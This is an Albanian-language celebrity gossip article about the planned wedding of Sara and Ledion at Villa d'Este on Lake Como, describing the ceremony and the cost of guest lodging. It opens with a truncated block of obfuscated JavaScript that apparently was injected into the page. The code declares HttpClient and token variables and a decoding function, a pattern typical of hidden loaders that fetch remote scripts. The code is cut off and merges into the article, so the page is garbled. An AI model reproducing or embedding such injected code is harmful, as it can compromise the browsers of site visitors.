;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zbulohet vendi madhështor ku do të mbahet dasma e Sarës me Ledionin

By

Sara e veshur nuse, me vellon që i mbulon sytë, ndoshta në krah do të ketë të vëllain Itanin, për ta shoqëruar drejt altarit të improvizuar në ambientin e oborrit të hotelit luksoz, Villa d’Este.

Tejet i emocionuar me smoking-un e zi veshur, e me emocionet që do t’i lexohen lehtësisht, në krye të altarit do të jetë Ledioni, i cili së bashku me të birin London, të dy bashkë do të presin femrën e jetës së tyre, teksa drejtohet drejt tyre.

Sara dhe Ledioni do të betohen këtë gusht, përpara Zotit dhe miqve për dashuri të përjetshme.

Çifti ka zgjedhur një prej vendeve më të bukur të botës, për të celebruar dashurinë e tyre, pikërisht buzë liqenit të Como.

Ndërtesat e vjetra, të cilat dëshmojnë aristokracinë e hershme , paksa të zbehur, por që mistershëm ende i shkon kohës, ndërthurur me luksin e kohëve moderne, me siguri do t’i dhurojë dasmës së çiftit të njohur shqiptar, një ceremoni të përsosur mes bukurisë natyrore dhe asaj artificiale.

Trashëgimtarja dhe moderatori i Top Channel thuhet se do të kenë dhjetra të ftuar në dasmë, për të cilët është menduar edhe akomodimi në ambientet e Villa d’Este, në të cilin qëndrimi për 1 natë kushton 500 euro personi, shkruan bordo.al.

Artikuj të ngjashëm